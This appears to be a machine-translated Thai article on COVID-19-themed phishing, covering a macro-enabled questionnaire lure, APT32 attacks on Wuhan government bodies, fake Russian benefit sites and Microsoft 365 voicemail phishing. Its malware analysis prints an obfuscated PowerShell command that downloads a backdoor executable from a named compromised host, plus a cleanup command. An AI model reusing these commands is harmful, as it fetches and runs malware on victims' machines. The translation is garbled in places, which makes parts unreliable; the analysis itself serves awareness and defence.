ผู้โจมตียังคงใช้ประโยชน์จากหัวข้อเรื่องโควิด-19 โดยสร้างภัยคุกคามสำหรับผู้ใช้ที่สนใจทุกสิ่งที่เกี่ยวข้องกับโรคระบาดมากขึ้นเรื่อยๆ ใน
จำเข้าไว้.
คุณต้องการตรวจเชื้อ COVID-19 ฟรีหรือไม่?
อีกตัวอย่างที่สำคัญของฟิชชิ่งที่มีธีมเกี่ยวกับไวรัสโคโรนาก็คือ
การโน้มน้าวให้ผู้ใช้ส่วนใหญ่เปิดใช้งานมาโครก็เป็นเรื่องง่ายเช่นกัน ในการดำเนินการนี้ มีการใช้เคล็ดลับมาตรฐาน: ในการกรอกแบบสอบถาม คุณต้องเปิดใช้งานมาโครก่อน ซึ่งหมายความว่าคุณต้องเรียกใช้สคริปต์ VBA
อย่างที่คุณเห็นสคริปต์ VBA ได้รับการปกปิดเป็นพิเศษจากโปรแกรมป้องกันไวรัส
Windows มีคุณลักษณะการรอที่แอปพลิเคชันรอ /T <วินาที> ก่อนที่จะยอมรับคำตอบเริ่มต้น "ใช่" ในกรณีของเรา สคริปต์รอ 65 วินาทีก่อนที่จะลบไฟล์ชั่วคราว:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
และระหว่างรอก็มีการดาวน์โหลดมัลแวร์ มีการเปิดตัวสคริปต์ PowerShell พิเศษสำหรับสิ่งนี้:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
หลังจากถอดรหัสค่า Base64 แล้ว สคริปต์ PowerShell จะดาวน์โหลดแบ็คดอร์ที่อยู่บนเว็บเซิร์ฟเวอร์ที่ถูกแฮ็กก่อนหน้านี้จากเยอรมนี:
http://automatischer-staubsauger.com/feature/777777.png
และบันทึกไว้ในชื่อ:
C:UsersPublictmpdirfile1.exe
โฟลเดอร์ ‘C:UsersPublictmpdir’
ถูกลบเมื่อรันไฟล์ 'tmps1.bat' ที่มีคำสั่ง cmd /c mkdir ""C:UsersPublictmpdir"".
โจมตีหน่วยงานของรัฐแบบกำหนดเป้าหมาย
นอกจากนี้ นักวิเคราะห์ของ FireEye ยังรายงานเมื่อเร็วๆ นี้ว่าการโจมตี APT32 แบบกำหนดเป้าหมายซึ่งมุ่งเป้าไปที่โครงสร้างของรัฐบาลในหวู่ฮั่น รวมถึงกระทรวงการจัดการเหตุฉุกเฉินของจีน RTF ที่แจกจ่ายรายการหนึ่งมีลิงก์ไปยังบทความของ New York Times ที่มีชื่อว่า
ที่น่าสนใจ ณ เวลาที่ตรวจพบ ไม่มีโปรแกรมป้องกันไวรัสตัวใดตรวจพบอินสแตนซ์นี้ ตามข้อมูลของ Virustotal
เมื่อเว็บไซต์ทางการล่ม
ตัวอย่างการโจมตีแบบฟิชชิ่งที่โดดเด่นที่สุดเกิดขึ้นในรัสเซียเมื่อวันก่อน เหตุผลก็คือการแต่งตั้งผลประโยชน์ที่รอคอยมานานสำหรับเด็กอายุ 3 ถึง 16 ปี เมื่อมีการประกาศเริ่มรับสมัครในวันที่ 12 พฤษภาคม 2020 ผู้คนหลายล้านคนต่างรีบไปที่เว็บไซต์บริการของรัฐเพื่อขอความช่วยเหลือที่รอคอยมานาน และทำให้พอร์ทัลพังลงไม่เลวร้ายไปกว่าการโจมตี DDoS ระดับมืออาชีพ เมื่อประธานาธิบดีกล่าวว่า “หน่วยงานของรัฐไม่สามารถรับมือกับกระแสของการสมัครได้” ผู้คนเริ่มพูดคุยทางออนไลน์เกี่ยวกับการเปิดตัวเว็บไซต์ทางเลือกในการรับใบสมัคร
ปัญหาคือหลายไซต์เริ่มทำงานพร้อมกัน และในขณะที่ไซต์หนึ่งซึ่งเป็นไซต์จริงที่ posobie16.gosuslugi.ru ยอมรับแอปพลิเคชันจริง ๆ มากกว่า
เพื่อนร่วมงานจาก SearchInform พบโดเมนหลอกลวงใหม่ประมาณ 30 โดเมนในโซน .ru Infosecurity และ Softline Company ได้ติดตามเว็บไซต์บริการของรัฐบาลปลอมที่คล้ายกันมากกว่า 70 แห่งตั้งแต่ต้นเดือนเมษายน ผู้สร้างของพวกเขาดัดแปลงสัญลักษณ์ที่คุ้นเคย และยังใช้การผสมคำว่า gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie และอื่นๆ
วิศวกรรมการโฆษณาและสังคม
ตัวอย่างทั้งหมดนี้ยืนยันว่าผู้โจมตีสร้างรายได้จากหัวข้อไวรัสโคโรนาได้สำเร็จ และยิ่งความตึงเครียดทางสังคมสูงขึ้นและปัญหาที่ไม่ชัดเจนก็ยิ่งมีโอกาสมากขึ้นที่นักต้มตุ๋นจะต้องขโมยข้อมูลสำคัญ บังคับให้ผู้คนยอมสละเงินด้วยตัวเอง หรือเพียงแค่แฮ็กคอมพิวเตอร์มากขึ้น
และเนื่องจากการแพร่ระบาดได้ส่งผลให้ผู้ที่ไม่ได้เตรียมตัวต้องทำงานจากที่บ้านเป็นจำนวนมาก ไม่เพียงแต่เรื่องส่วนตัวเท่านั้น แต่ยังรวมไปถึงข้อมูลขององค์กรที่ตกอยู่ในความเสี่ยงด้วย ตัวอย่างเช่น เมื่อเร็วๆ นี้ ผู้ใช้ Microsoft 365 (เดิมคือ Office 365) ก็ถูกโจมตีแบบฟิชชิ่งเช่นกัน ผู้คนได้รับข้อความเสียง "พลาด" จำนวนมากเป็นไฟล์แนบไปกับจดหมาย อย่างไรก็ตาม ไฟล์เหล่านี้จริงๆ แล้วเป็นหน้า HTML ที่ส่งเหยื่อของการโจมตีไปให้
ที่มา: will.com